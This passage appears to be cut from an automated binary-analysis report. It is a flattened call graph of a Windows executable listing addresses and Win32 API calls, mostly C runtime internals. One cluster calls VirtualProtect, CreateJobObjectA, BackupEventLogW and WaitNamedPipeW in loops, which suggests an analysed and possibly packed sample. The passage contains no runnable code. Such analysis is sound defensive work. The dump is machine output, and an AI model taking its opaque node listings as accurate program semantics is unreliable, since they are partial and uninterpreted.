API calls 9148->9153 9149 407601 9152 40747b _puts 68 API calls 9149->9152 9150->9078 9152->9150 9155 407617 9153->9155 9156 40764b 9155->9156 9157 40761f 9155->9157 9158 40617d __fclose_nolock 68 API calls 9156->9158 9159 40c782 __getstream InitializeCriticalSectionAndSpinCount 9157->9159 9160 40763c 9158->9160 9161 40762a 9159->9161 9218 407667 9160->9218 9161->9160 9163 40617d __fclose_nolock 68 API calls 9161->9163 9164 407636 9163->9164 9165 40747b _puts 68 API calls 9164->9165 9165->9160 9221 40ddce 9166->9221 9169 40851b 9171 40835c __NMSG_WRITE 68 API calls 9169->9171 9174 4075ce 9169->9174 9170 40ddce __set_error_mode 68 API calls 9170->9169 9172 408533 9171->9172 9173 40835c __NMSG_WRITE 68 API calls 9172->9173 9173->9174 9175 40835c 9174->9175 9176 408370 9175->9176 9177 40ddce __set_error_mode 65 API calls 9176->9177 9208 4075d5 9176->9208 9178 408392 9177->9178 9179 4084d0 GetStdHandle 9178->9179 9181 40ddce __set_error_mode 65 API calls 9178->9181 9180 4084de _strlen 9179->9180 9179->9208 9184 4084f7 WriteFile 9180->9184 9180->9208 9182 4083a3 9181->9182 9182->9179 9183 4083b5 9182->9183 9183->9208 9227 40dd66 9183->9227 9184->9208 9187 4083eb GetModuleFileNameA 9189 408409 9187->9189 9193 40842c _strlen 9187->9193 9190 40dd66 _strcpy_s 65 API calls 9189->9190 9192 408419 9190->9192 9192->9193 9194 40973f __invoke_watson 10 API calls 9192->9194 9205 40846f 9193->9205 9243 40dcb1 9193->9243 9194->9193 9198 40973f __invoke_watson 10 API calls 9201 408493 9198->9201 9199 40dc3d _strcat_s 65 API calls 9202 4084a7 9199->9202 9201->9199 9204 4084b8 9202->9204 9206 40973f __invoke_watson 10 API calls 9202->9206 9203 40973f __invoke_watson 10 API calls 9203->9205 9261 40dad4 9204->9261 9252 40dc3d 9205->9252 9206->9204 9209 406c3c 9208->9209 9299 406c11 GetModuleHandleW 9209->9299 9214 40d680 9212->9214 9215 4075fa 9214->9215 9216 40d697 Sleep 9214->9216 9302 40625a 9214->9302 9215->9148 9215->9149 9217 40d6ac 9216->9217 9217->9214 9217->9215 9332 407596 LeaveCriticalSection 9218->9332 9220 40766e 9220->9150 9222 40dddd 9221->9222 9223 40747b _puts 68 API calls 9222->9223 9224 40850e 9222->9224 9225 40de00 9223->9225 9224->9169 9224->9170 9226 409867 _puts 6 API calls 9225->9226 9226->9224 9228 40dd77 9227->9228 9229 40dd7e 9227->9229 9228->9229 9234 40dda4 9228->9234 9230 40747b _puts 68 API calls 9229->9230 9231 40dd83 9230->9231 9232 409867 _puts 6 API calls 9231->9232 9233 4083d7 9232->9233 9233->9187 9236 40973f 9233->9236 9234->9233 9235 40747b _puts 68 API calls 9234->9235 9235->9231 9288 40b080 9236->9288 9238 40976c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9239 409848 GetCurrentProcess TerminateProcess 9238->9239 9240 40983c __invoke_watson 9238->9240 9290 40dac5 9239->9290 9240->9239 9242 4083e8 9242->9187 9248 40dcc3 9243->9248 9244 40dcc7 9245 40845c 9244->9245 9246 40747b _puts 68 API calls 9244->9246 9245->9203 9245->9205 9247 40dce3 9246->9247 9249 409867 _puts 6 API calls 9247->9249 9248->9244 9248->9245 9250 40dd0d 9248->9250 9249->9245 9250->9245 9251 40747b _puts 68 API calls 9250->9251 9251->9247 9253 40dc55 9252->9253 9255 40dc4e 9252->9255 9254 40747b _puts 68 API calls 9253->9254 9260 40dc5a 9254->9260 9255->9253 9257 40dc89 9255->9257 9256 409867 _puts 6 API calls 9258 408482 9256->9258 9257->9258 9259 40747b _puts 68 API calls 9257->9259 9258->9198 9258->9201 9259->9260 9260->9256 9262 40bb1b __init_pointers 7 API calls 9261->9262 9263 40dae4 9262->9263 9264 40db7f 9263->9264 9265 40daf7 LoadLibraryA 9263->9265 9272 40bb24 __decode_pointer 6 API calls 9264->9272 9283 40dba9 9264->9283 9266 40dc21 9265->9266 9267 40db0c GetProcAddress 9265->9267 9266->9208 9267->9266 9269 40db22 9267->9269 9268 40dbd4 9270 40bb24 __decode_pointer 6 API calls 9268->9270 9273 40baa9 __encode_pointer 7 API calls 9269->9273 9270->9266 9271 40bb24 __decode_pointer 6 API calls 9282 40dbec 9271->9282 9274 40db9c 9272->9274 9275 40db28 GetProcAddress 9273->9275 9276 40bb24 __decode_pointer 6 API calls 9274->9276 9277 40baa9 __encode_pointer 7 API calls 9275->9277 9276->9283 9278 40db3d GetProcAddress 9277->9278 9279 40baa9 __encode_pointer 7 API calls 9278->9279 9280 40db52 GetProcAddress 9279->9280 9281 40baa9 __encode_pointer 7 API calls 9280->9281 9284 40db67 9281->9284 9282->9268 9285 40bb24 __decode_pointer 6 API calls 9282->9285 9283->9268 9283->9271 9284->9264 9286 40db71 GetProcAddress 9284->9286 9285->9268 9287 40baa9 __encode_pointer 7 API calls 9286->9287 9287->9264 9289 40b08c __VEC_memzero 9288->9289 9289->9238 9291 40dacd 9290->9291 9292 40dacf IsDebuggerPresent 9290->9292 9291->9242 9298 40fe79 9292->9298 9295 41177a SetUnhandledExceptionFilter UnhandledExceptionFilter 9296 411797 __invoke_watson 9295->9296 9297 41179f GetCurrentProcess TerminateProcess 9295->9297 9296->9297 9297->9242 9298->9295 9300 406c25 GetProcAddress 9299->9300 9301 406c35 ExitProcess 9299->9301 9300->9301 9303 40626c 9302->9303 9304 40630d 9302->9304 9311 4062c9 RtlAllocateHeap 9303->9311 9313 40627d 9303->9313 9314 4062f9 9303->9314 9316 40854f _realloc 6 API calls 9303->9316 9317 4062fe 9303->9317 9319 406305 9303->9319 9320 40620b 9303->9320 9305 40854f _realloc 6 API calls 9304->9305 9306 406313 9305->9306 9308 40747b _puts 67 API calls 9306->9308 9307 408507 __FF_MSGBANNER 67 API calls 9307->9313 9308->9319 9310 40835c __NMSG_WRITE 67 API calls 9310->9313 9311->9303 9312 406c3c _fast_error_exit 3 API calls 9312->9313 9313->9303 9313->9307 9313->9310 9313->9312 9315 40747b _puts 67 API calls 9314->9315 9315->9317 9316->9303 9318 40747b _puts 67 API calls 9317->9318 9318->9319 9319->9214 9321 406217 _puts 9320->9321 9322 406248 _puts 9321->9322 9323 407670 __lock 68 API calls 9321->9323 9322->9303 9324 40622d 9323->9324 9325 407e82 ___sbh_alloc_block 5 API calls 9324->9325 9326 406238 9325->9326 9328 406251 9326->9328 9331 407596 LeaveCriticalSection 9328->9331 9330 406258 9330->9322 9331->9330 9332->9220 9334 407a30 HeapAlloc 9333->9334 9335 4079fc HeapReAlloc 9333->9335 9336 407a1a 9334->9336 9338 407a53 VirtualAlloc 9334->9338 9335->9336 9337 407a1e 9335->9337 9336->9086 9337->9334 9338->9336 9339 407a6d HeapFree 9338->9339 9339->9336 9341 407ab0 VirtualAlloc 9340->9341 9343 407af7 9341->9343 9343->9083 9344->9089 9345->9022 9364 407596 LeaveCriticalSection 9346->9364 9348 40bca7 9348->9032 9350 40ef53 InterlockedIncrement 9349->9350 9351 40ef56 9349->9351 9350->9351 9352 40ef60 InterlockedIncrement 9351->9352 9353 40ef63 9351->9353 9352->9353 9354 40ef70 9353->9354 9355 40ef6d InterlockedIncrement 9353->9355 9356 40ef7a InterlockedIncrement 9354->9356 9358 40ef7d 9354->9358 9355->9354 9356->9358 9357 40ef96 InterlockedIncrement 9357->9358 9358->9357 9359 40efa6 InterlockedIncrement 9358->9359 9360 40efb1 InterlockedIncrement 9358->9360 9359->9358 9360->9035 9365 407596 LeaveCriticalSection 9361->9365 9363 40bcf5 9363->9037 9364->9348 9365->9363 9366->8889 9368 411303 9367->9368 9369 4112fc 9367->9369 9370 40747b _puts 68 API calls 9368->9370 9369->9368 9373 41132f 9369->9373 9371 411308 9370->9371 9372 409867 _puts 6 API calls 9371->9372 9374 411317 9372->9374 9373->9374 9375 40747b _puts 68 API calls 9373->9375 9374->8920 9375->9371 9377 40c1d6 9376->9377 9378 40baa9 __encode_pointer 7 API calls 9377->9378 9379 40c1ee 9377->9379 9378->9377 9379->8928 9383 40c131 9380->9383 9382 40c17a 9382->8930 9384 40c13d _puts 9383->9384 9391 406c54 9384->9391 9390 40c15e _puts 9390->9382 9392 407670 __lock 68 API calls 9391->9392 9393 406c5b 9392->9393 9394 40c046 9393->9394 9395 40bb24 __decode_pointer 6 API calls 9394->9395 9396 40c05a 9395->9396 9397 40bb24 __decode_pointer 6 API calls 9396->9397 9398 40c06a 9397->9398 9407 40c0ed 9398->9407 9414 411089 9398->9414 9400 40baa9 __encode_pointer 7 API calls 9402 40c0e2 9400->9402 9401 40c088 9403 40c0ac 9401->9403 9410 40c0d4 9401->9410 9427 40d708 9401->9427 9404 40baa9 __encode_pointer 7 API calls 9402->9404 9406 40d708 __realloc_crt 74 API calls 9403->9406 9403->9407 9408 40c0c2 9403->9408 9404->9407 9406->9408 9411 40c167 9407->9411 9408->9407 9409 40baa9 __encode_pointer 7 API calls 9408->9409 9409->9410 9410->9400 9476 406c5d 9411->9476 9415 411095 _puts 9414->9415 9416 4110c2 9415->9416 9417 4110a5 9415->9417 9419 411103 HeapSize 9416->9419 9421 407670 __lock 68 API calls 9416->9421 9418 40747b _puts 68 API calls 9417->9418 9420 4110aa 9418->9420 9423 4110ba _puts 9419->9423 9422 409867 _puts 6 API calls 9420->9422 9424 4110d2 ___sbh_find_block 9421->9424 9422->9423 9423->9401 9432 411123 9424->9432 9431 40d711 9427->9431 9429 40d750 9429->9403 9430 40d731 Sleep 9430->9431 9431->9429 9431->9430 9436 411492 9431->9436 9435 407596 LeaveCriticalSection 9432->9435 9434 4110fe 9434->9419 9434->9423 9435->9434 9437 41149e _puts 9436->9437 9438 4114b3 9437->9438 9439 4114a5 9437->9439 9440 4114c6 9438->9440 9441 4114ba 9438->9441 9442 40625a _malloc 68 API calls 9439->9442 9448 411638 9440->9448 9470 4114d3 ___sbh_resize_block _realloc ___sbh_find_block 9440->9470 9443 40617d __fclose_nolock 68 API calls 9441->9443 9458 4114ad _puts _realloc 9442->9458 9443->9458 9444 41166b 9447 40854f _realloc 6 API calls 9444->9447 9445 41163d HeapReAlloc 9445->9448 9445->9458 9446 407670 __lock 68 API calls 9446->9470 9449 411671 9447->9449 9448->9444 9448->9445 9450 41168f 9448->9450 9452 40854f _realloc 6 API calls 9448->9452 9454 411685 9448->9454 9451 40747b _puts 68 API calls 9449->9451 9453 40747b _puts 68 API calls 9450->9453 9450->9458 9451->9458 9452->9448 9455 411698 GetLastError 9453->9455 9457 40747b _puts 68 API calls 9454->9457 9455->9458 9459 411606 9457->9459 9458->9431 9459->9458 9461 41160b GetLastError 9459->9461 9460 41155e HeapAlloc 9460->9470 9461->9458 9462 4115b3 HeapReAlloc 9462->9470 9463 407e82 ___sbh_alloc_block 5 API calls 9463->9470 9464 41161e 9464->9458 9466 40747b _puts 68 API calls 9464->9466 9465 40854f _realloc 6 API calls 9465->9470 9468 41162b 9466->9468 9467 411601 9469 40747b _puts 68 API calls 9467->9469 9468->9455 9468->9458 9469->9459 9470->9444 9470->9446 9470->9458 9470->9460 9470->9462 9470->9463 9470->9464 9470->9465 9470->9467 9471 4076d3 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 9470->9471 9472 4115d6 9470->9472 9471->9470 9475 407596 LeaveCriticalSection 9472->9475 9474 4115dd 9474->9470 9475->9474 9479 407596 LeaveCriticalSection 9476->9479 9478 406c64 9478->9390 9479->9478 9481 404ed3 __write_nolock 9480->9481 9482 404ef8 GetModuleHandleW LocalAlloc 9481->9482 9604 40650a 9481->9604 9602 404e1c GetProcAddress VirtualProtect 9482->9602 9485 404f2b 9487 404f6b 9485->9487 9488 404f56 CreateJobObjectA 9485->9488 9486 404eea 9489 406e58 68 API calls 9486->9489 9490 404f79 7 API calls 9487->9490 9491 405001 9487->9491 9488->9485 9489->9482 9490->9487 9492 405003 GetLastError 9491->9492 9493 40578f GetSystemDefaultLCID 9491->9493 9494 4057aa 9491->9494 9492->9491 9492->9493 9493->9491 9493->9494 9607 404d37 9494->9607 9496 4057b9 9497 4057af 9496->9497 9497->9496 9498 4057d3 FindActCtxSectionStringW 9497->9498 9499 4057e7 9497->9499 9498->9497 9500 405804 11 API calls 9499->9500 9501 405891 9499->9501 9500->9499 9603 404b4d LoadLibraryA 9501->9603 9503 405896 9503->8846 9503->8971 9505 406713 _puts 9504->9505 9506 406726 9505->9506 9508 406752 9505->9508 9507 40747b _puts 68 API calls 9506->9507 9509 40672b 9507->9509 9925 408f70 9508->9925 9511 409867 _puts 6 API calls 9509->9511 9518 40673b _puts 9511->9518 9513 4067d5 9515 406801 9513->9515 9937 4099e3 9513->9937 9968 406819 9515->9968 9518->8939 9524 40747b _puts 68 API calls 9525 4067c5 9524->9525 9526 409867 _puts 6 API calls 9525->9526 9526->9513 9528 40664e _puts 9527->9528 9529 406679 _puts 9528->9529 9530 40665c 9528->9530 10129 408fb1 9529->10129 9531 40747b _puts 68 API calls 9530->9531 9532 406661 9531->9532 9533 409867 _puts 6 API calls 9532->9533 9537 406671 _puts 9533->9537 9535 40668b _puts 9536 4099e3 __stbuf 68 API calls 9535->9536 9538 40669d _puts 9536->9538 9537->8945 9539 409b59 __output_l 104 API calls 9538->9539 9540 4066b5 _puts 9539->9540 9541 409a7f __ftbuf 102 API calls 9540->9541 9542 4066c6 9541->9542 10134 4066de 9542->10134 9545 40661a 9544->9545 9546 4065ff 9544->9546 10144 40652b 9545->10144 9547 40747b _puts 68 API calls 9546->9547 9549 406604 9547->9549 9552 409867 _puts 6 API calls 9549->9552 9550 40662a 9551 405f50 9550->9551 9553 40747b _puts 68 API calls 9550->9553 9554 4064ae 9551->9554 9552->9551 9553->9551 9555 4064ba _puts 9554->9555 9556 4064c1 9555->9556 9557 4064ca 9555->9557 10450 4063d4 9556->10450 9558 408f70 __lock_file 69 API calls 9557->9558 9560 4064d2 9558->9560 10460 40638c 9560->10460 9564 4064c7 _puts 9564->8949 9567 406b3f _puts 9565->9567 9566 406b4d 9569 40747b _puts 68 API calls 9566->9569 9567->9566 9568 406b7b 9567->9568 9570 408f70 __lock_file 69 API calls 9568->9570 9571 406b52 9569->9571 9572 406b83 9570->9572 9573 409867 _puts 6 API calls 9571->9573 10506 406aa9 9572->10506 9575 406b62 _puts 9573->9575 9575->8951 10567 406060 9578->10567 9580 404b41 9581 40694a 9580->9581 9583 406956 _puts 9581->9583 9582 40696a 9584 40747b _puts 68 API calls 9582->9584 9583->9582 9586 4069f4 _puts 9583->9586 9588 408d86 __fileno 68 API calls 9583->9588 9585 40696f 9584->9585 9587 409867 _puts 6 API calls 9585->9587 9589 408fb1 _puts 69 API calls 9586->9589 9590 40697f _puts 9587->9590 9592 40699d 9588->9592 9591 406a04 _puts 9589->9591 9590->8955 9593 4099e3 __stbuf 68 API calls 9591->9593 9592->9582 9592->9586 9594 406a17 _puts _strlen 9593->9594 10627 40b5c9 9594->10627 9596 406a37 _puts 9601 406a4a _puts 9596->9601 10639 40b465 9596->10639 9597 409a7f __ftbuf 102 API calls 9598 406a7f 9597->9598 10660 406a96 9598->10660 9601->9597 9602->9485 9603->9503 9612 409304 9604->9612 9608 404d44 __write_nolock 9607->9608 9609 404d70 9 API calls 9608->9609 9611 404dfd 9608->9611 9918 404bb7 9608->9918 9609->9608 9611->9497 9613 40931d 9612->9613 9616 4090d5 9613->9616 9628 40904e 9616->9628 9618 4090fc 9620 40747b _puts 68 API calls 9618->9620 9621 409101 9620->9621 9622 409867 _puts 6 API calls 9621->9622 9625 40651b 9622->9625 9624 409139 9626 40917e 9624->9626 9636 40f111 9624->9636 9625->9486 9626->9625 9627 40747b _puts 68 API calls 9626->9627 9627->9625 9629 409061 9628->9629 9631 4090ae 9628->9631 9643 40bd70 9629->9643 9631->9618 9631->9624 9632 40908e 9632->9631 9663 40e92f 9632->9663 9637 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9636->9637 9638 40f125 9637->9638 9642 40f132 9638->9642 9851 40e00f 9638->9851 9642->9624 9644 40bcf7 __getptd_noexit 68 API calls 9643->9644 9645 40bd78 9644->9645 9646 406be8 __amsg_exit 68 API calls 9645->9646 9647 409066 9645->9647 9646->9647 9647->9632 9648 40f09b 9647->9648 9649 40f0a7 _puts 9648->9649 9650 40bd70 __getptd 68 API calls 9649->9650 9651 40f0ac 9650->9651 9652 40f0da 9651->9652 9653 40f0be 9651->9653 9654 407670 __lock 68 API calls 9652->9654 9655 40bd70 __getptd 68 API calls 9653->9655 9656 40f0e1 9654->9656 9657 40f0c3 9655->9657 9679 40f05d 9656->9679 9660 40f0d1 _puts 9657->9660 9662 406be8 __amsg_exit 68 API calls 9657->9662 9660->9632 9662->9660 9664 40e93b _puts 9663->9664 9665 40bd70 __getptd 68 API calls 9664->9665 9666 40e940 9665->9666 9667 407670 __lock 68 API calls 9666->9667 9668 40e952 9666->9668 9669 40e970 9667->9669 9671 40e960 _puts 9668->9671 9675 406be8 __amsg_exit 68 API calls 9668->9675 9670 40e9b9 9669->9670 9672 40e9a1 InterlockedIncrement 9669->9672 9673 40e987 InterlockedDecrement 9669->9673 9847 40e9ca 9670->9847 9671->9631 9672->9670 9673->9672 9676 40e992 9673->9676 9675->9671 9676->9672 9677 40617d __fclose_nolock 68 API calls 9676->9677 9678 40e9a0 9677->9678 9678->9672 9680 40f061 9679->9680 9686 40f093 9679->9686 9681 40ef35 ___addlocaleref 8 API calls 9680->9681 9680->9686 9682 40f074 9681->9682 9682->9686 9690 40efc4 9682->9690 9687 40f105 9686->9687 9846 407596 LeaveCriticalSection 9687->9846 9689 40f10c 9689->9657 9691 40efd5 InterlockedDecrement 9690->9691 9692 40f058 9690->9692 9693 40efea InterlockedDecrement 9691->9693 9694 40efed 9691->9694 9692->9686 9704 40edec 9692->9704 9693->9694 9695 40eff7 InterlockedDecrement 9694->9695 9696 40effa 9694->9696 9695->9696 9697 40f004 InterlockedDecrement 9696->9697 9698 40f007 9696->9698 9697->9698 9699 40f011 InterlockedDecrement 9698->9699 9701 40f014 9698->9701 9699->9701 9700 40f02d InterlockedDecrement 9700->9701 9701->9700 9702 40f03d InterlockedDecrement 9701->9702 9703 40f048 InterlockedDecrement 9701->9703 9702->9701 9703->9692 9705 40ee70 9704->9705 9707 40ee03 9704->9707 9706 40eebd 9705->9706 9708 40617d __fclose_nolock 68 API calls 9705->9708 9719 40eee4 9706->9719 9758 411ed8 9706->9758 9707->9705 9715 40617d __fclose_nolock 68 API calls 9707->9715 9730 40ee37 9707->9730 9710 40ee91 9708->9710 9712 40617d __fclose_nolock 68 API calls 9710->9712 9717 40eea4 9712->9717 9713 40617d __fclose_nolock 68 API calls 9718 40ee65 9713->9718 9714 40617d __fclose_nolock 68 API calls 9714->9719 9720 40ee2c 9715->9720 9716 40ef29 9721 40617d __fclose_nolock 68 API calls 9716->9721 9724 40617d __fclose_nolock 68 API calls 9717->9724 9725 40617d __fclose_nolock 68 API calls 9718->9725 9719->9716 9723 40617d 68 API calls __fclose_nolock 9719->9723 9734 4120b2 9720->9734 9727 40ef2f 9721->9727 9722 40617d __fclose_nolock 68 API calls 9728 40ee4d 9722->9728 9723->9719 9729 40eeb2 9724->9729 9725->9705 9727->9686 9750 41206d 9728->9750 9732 40617d __fclose_nolock 68 API calls 9729->9732 9730->9722 9733 40ee58 9730->9733 9732->9706 9733->9713 9735 4120bf 9734->9735 9749 41213c 9734->9749 9736 4120d0 9735->9736 9737 40617d __fclose_nolock 68 API calls 9735->9737 9738 4120e2 9736->9738 9739 40617d __fclose_nolock 68 API calls 9736->9739 9737->9736 9740 4120f4 9738->9740 9741 40617d __fclose_nolock 68 API calls 9738->9741 9739->9738 9742 412106 9740->9742 9743 40617d __fclose_nolock 68 API calls 9740->9743 9741->9740 9744 40617d __fclose_nolock 68 API calls 9742->9744 9747 412118 9742->9747 9743->9742 9744->9747 9745 40617d __fclose_nolock 68 API calls 9746 41212a 9745->9746 9748 40617d __fclose_nolock 68 API calls 9746->9748 9746->9749 9747->9745 9747->9746 9748->9749 9749->9730 9751 41207a 9750->9751 9757 4120ae 9750->9757 9752 41208a 9751->9752 9754 40617d __fclose_nolock 68 API calls 9751->9754 9753 41209c 9752->9753 9755 40617d __fclose_nolock 68 API calls 9752->9755 9756 40617d __fclose_nolock 68 API calls 9753->9756 9753->9757 9754->9752 9755->9753 9756->9757 9757->9733 9759 411ee9 9758->9759 9845 40eedd 9758->9845 9760 40617d __fclose_nolock 68 API calls 9759->9760 9761 411ef1 9760->9761 9762 40617d __fclose_nolock 68 API calls 9761->9762 9763 411ef9 9762->9763 9764 40617d __fclose_nolock 68 API calls 9763->9764 9765 411f01 9764->9765 9766 40617d __fclose_nolock 68 API calls 9765->9766 9767 411f09 9766->9767 9768 40617d __fclose_nolock 68 API calls 9767->9768 9769 411f11 9768->9769 9770 40617d __fclose_nolock 68 API calls 9769->9770 9771 411f19 9770->9771 9772 40617d __fclose_nolock 68 API calls 9771->9772 9773 411f20 9772->9773 9774 40617d __fclose_nolock 68 API calls 9773->9774 9775 411f28 9774->9775 9776 40617d __fclose_nolock 68 API calls 9775->9776 9777 411f30 9776->9777 9778 40617d __fclose_nolock 68 API calls 9777->9778 9779 411f38 9778->9779 9780 40617d __fclose_nolock 68 API calls 9779->9780 9781 411f40 9780->9781 9782 40617d __fclose_nolock 68 API calls 9781->9782 9783 411f48 9782->9783 9784 40617d __fclose_nolock 68 API calls 9783->9784 9785 411f50 9784->9785 9786 40617d __fclose_nolock 68 API calls 9785->9786 9787 411f58 9786->9787 9788 40617d __fclose_nolock 68 API calls 9787->9788 9789 411f60 9788->9789 9790 40617d __fclose_nolock 68 API calls 9789->9790 9791 411f68 9790->9791 9792 40617d __fclose_nolock 68 API calls 9791->9792 9793 411f73 9792->9793 9794 40617d __fclose_nolock 68 API calls 9793->9794 9795 411f7b 9794->9795 9796 40617d __fclose_nolock 68 API calls 9795->9796 9797 411f83 9796->9797 9798 40617d __fclose_nolock 68 API calls 9797->9798 9799 411f8b 9798->9799 9800 40617d __fclose_nolock 68 API calls 9799->9800 9801 411f93 9800->9801 9802 40617d __fclose_nolock 68 API calls 9801->9802 9803 411f9b 9802->9803 9804 40617d __fclose_nolock 68 API calls 9803->9804 9805 411fa3 9804->9805 9806 40617d __fclose_nolock 68 API calls 9805->9806 9807 411fab 9806->9807 9808 40617d __fclose_nolock 68 API calls 9807->9808 9809 411fb3 9808->9809 9810 40617d __fclose_nolock 68 API calls 9809->9810 9811 411fbb 9810->9811 9812 40617d __fclose_nolock 68 API calls 9811->9812 9813 411fc3 9812->9813 9814 40617d __fclose_nolock 68 API calls 9813->9814 9815 411fcb 9814->9815 9816 40617d __fclose_nolock 68 API calls 9815->9816 9817 411fd3 9816->9817 9818 40617d __fclose_nolock 68 API calls 9817->9818 9819 411fdb 9818->9819 9820 40617d __fclose_nolock 68 API calls 9819->9820 9821 411fe3 9820->9821 9822 40617d __fclose_nolock 68 API calls 9821->9822 9823 411feb 9822->9823 9824 40617d __fclose_nolock 68 API calls 9823->9824 9825 411ff9 9824->9825 9826 40617d __fclose_nolock 68 API calls 9825->9826 9827 412004 9826->9827 9828 40617d __fclose_nolock 68 API calls 9827->9828 9829 41200f 9828->9829 9830 40617d __fclose_nolock 68 API calls 9829->9830 9831 41201a 9830->9831 9832 40617d __fclose_nolock 68 API calls 9831->9832 9833 412025 9832->9833 9834 40617d __fclose_nolock 68 API calls 9833->9834 9835 412030 9834->9835 9836 40617d __fclose_nolock 68 API calls 9835->9836 9837 41203b 9836->9837 9838 40617d __fclose_nolock 68 API calls 9837->9838 9839 412046 9838->9839 9840 40617d __fclose_nolock 68 API calls 9839->9840 9841 412051 9840->9841 9842 40617d __fclose_nolock 68 API calls 9841->9842 9843 41205c 9842->9843 9844 40617d __fclose_nolock 68 API calls 9843->9844 9844->9845 9845->9714 9846->9689 9850 407596 LeaveCriticalSection 9847->9850 9849 40e9d1 9849->9668 9850->9849 9852 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9851->9852 9853 40e022 9852->9853 9854 411e96 9853->9854 9855 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9854->9855 9856 411ea9 9855->9856 9859 411cdc 9856->9859 9860 411d28 9859->9860 9861 411cfd GetStringTypeW 9859->9861 9862 411d15 9860->9862 9864 411e0f 9860->9864 9861->9862 9863 411d1d GetLastError 9861->9863 9865 411d61 MultiByteToWideChar 9862->9865 9872 411e09 9862->9872 9863->9860 9887 4134ed GetLocaleInfoA 9864->9887 9870 411d8e 9865->9870 9865->9872 9867 40dac5 __atodbl_l 5 API calls 9869 411e94 9867->9869 9869->9642 9874 40625a _malloc 68 API calls 9870->9874 9878 411da3 _memset ___convertcp 9870->9878 9871 411e60 GetStringTypeA 9871->9872 9873 411e7b 9871->9873 9872->9867 9877 40617d __fclose_nolock 68 API calls 9873->9877 9874->9878 9876 411ddc MultiByteToWideChar 9880 411e03 9876->9880 9881 411df2 GetStringTypeW 9876->9881 9877->9872 9878->9872 9878->9876 9883 4112cb 9880->9883 9881->9880 9884 4112d7 9883->9884 9885 4112e8 9883->9885 9884->9885 9886 40617d __fclose_nolock 68 API calls 9884->9886 9885->9872 9886->9885 9888 413520 9887->9888 9889 41351b 9887->9889 9890 40650a ___ansicp 91 API calls 9888->9890 9891 40dac5 __atodbl_l 5 API calls 9889->9891 9890->9889 9892 411e33 9891->9892 9892->9871 9892->9872 9893 413536 9892->9893 9894 413600 9893->9894 9895 413576 GetCPInfo 9893->9895 9899 40dac5 __atodbl_l 5 API calls 9894->9899 9896 4135eb MultiByteToWideChar 9895->9896 9897 41358d 9895->9897 9896->9894 9902 4135a6 _strlen 9896->9902 9897->9896 9898 413593 GetCPInfo 9897->9898 9898->9896 9901 4135a0 9898->9901 9900 411e54 9899->9900 9900->9871 9900->9872 9901->9896 9901->9902 9903 40625a _malloc 68 API calls 9902->9903 9905 4135d8 _memset ___convertcp 9902->9905 9903->9905 9904 413635 MultiByteToWideChar 9906 41364d 9904->9906 9907 41366c 9904->9907 9905->9894 9905->9904 9909 413671 9906->9909 9910 413654 WideCharToMultiByte 9906->9910 9908 4112cb __freea 68 API calls 9907->9908 9908->9894 9911 413690 9909->9911 9912 41367c WideCharToMultiByte 9909->9912 9910->9907 9913 40d6bc __calloc_crt 68 API calls 9911->9913 9912->9907 9912->9911 9914 413698 9913->9914 9914->9907 9915 4136a1 WideCharToMultiByte 9914->9915 9915->9907 9916 4136b3 9915->9916 9917 40617d __fclose_nolock 68 API calls 9916->9917 9917->9907 9919 404bef 9918->9919 9920 404bff BackupEventLogW 9919->9920 9921 404c07 9919->9921 9920->9921 9922 404c93 GetLastError 9921->9922 9923 404cab WaitNamedPipeW AssignProcessToJobObject GetFullPathNameW 9921->9923 9924 404d25 9921->9924 9922->9921 9923->9921 9924->9608 9926 408f82 9925->9926 9927 408fa4 EnterCriticalSection 9925->9927 9926->9927 9928 408f8a 9926->9928 9929 40675b 9927->9929 9930 407670 __lock 68 API calls 9928->9930 9929->9513 9931 408d86 9929->9931 9930->9929 9932 40676b 9931->9932 9933 408d95 9931->9933 9932->9513 9932->9524 9934 40747b _puts 68 API calls 9933->9934 9935 408d9a 9934->9935 9936 409867 _puts 6 API calls 9935->9936 9936->9932 9938 408d86 __fileno 68 API calls 9937->9938 9939 4099f2 9938->9939 9971 40e05a 9939->9971 9941 4099f8 _puts 9942 4067e7 9941->9942 9943 40d677 __malloc_crt 68 API calls 9941->9943 9944 409b59 9942->9944 9943->9942 9945 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9944->9945 9946 409bc0 9945->9946 9947 409bc4 9946->9947 9950 408d86 __fileno 68 API calls 9946->9950 9956 409c05 __output_l __aulldvrm _strlen 9946->9956 9948 40747b _puts 68 API calls 9947->9948 9949 409bc9 9948->9949 9951 409867 _puts 6 API calls 9949->9951 9950->9956 9952 409bdb 9951->9952 9953 40dac5 __atodbl_l 5 API calls 9952->9953 9954 4067f7 9953->9954 9964 409a7f 9954->9964 9955 40e00f __isleadbyte_l 78 API calls 9955->9956 9956->9947 9956->9952 9956->9955 9957 409ab3 102 API calls _write_multi_char 9956->9957 9958 40617d __fclose_nolock 68 API calls 9956->9958 9959 40bb24 6 API calls __decode_pointer 9956->9959 9960 40d677 __malloc_crt 68 API calls 9956->9960 9961 409ae6 102 API calls _write_multi_char 9956->9961 9962 410127 80 API calls __cftof 9956->9962 9963 409b0c 102 API calls _write_string 9956->9963 9957->9956 9958->9956 9959->9956 9960->9956 9961->9956 9962->9956 9963->9956 9965 409a9d 9964->9965 9966 409a8a 9964->9966 9965->9515 9966->9965 9980 406324 9966->9980 10122 408fe3 9968->10122 9970 406821 9970->9518 9972 40e067 9971->9972 9974 40e076 9971->9974 9973 40747b _puts 68 API calls 9972->9973 9975 40e06c 9973->9975 9976 40e09a 9974->9976 9977 40747b _puts 68 API calls 9974->9977 9975->9941 9976->9941 9978 40e08a 9977->9978 9979 409867 _puts 6 API calls 9978->9979 9979->9976 9981 40633d 9980->9981 9985 40635f 9980->9985 9982 408d86 __fileno 68 API calls 9981->9982 9981->9985 9983 406358 9982->9983 9986 408caa 9983->9986 9985->9965 9987 408cb6 _puts 9986->9987 9988 408cd9 9987->9988 9989 408cbe 9987->9989 9991 408ce7 9988->9991 9995 408d28 9988->9995 10011 40748e 9989->10011 9993 40748e __free_osfhnd 68 API calls 9991->9993 9994 408cec 9993->9994 9997 40747b _puts 68 API calls 9994->9997 10014 40e409 9995->10014 9996 40747b _puts 68 API calls 10004 408ccb _puts 9996->10004 9999 408cf3 9997->9999 10001 409867 _puts 6 API calls 9999->10001 10000 408d2e 10002 408d51 10000->10002 10003 408d3b 10000->10003 10001->10004 10006 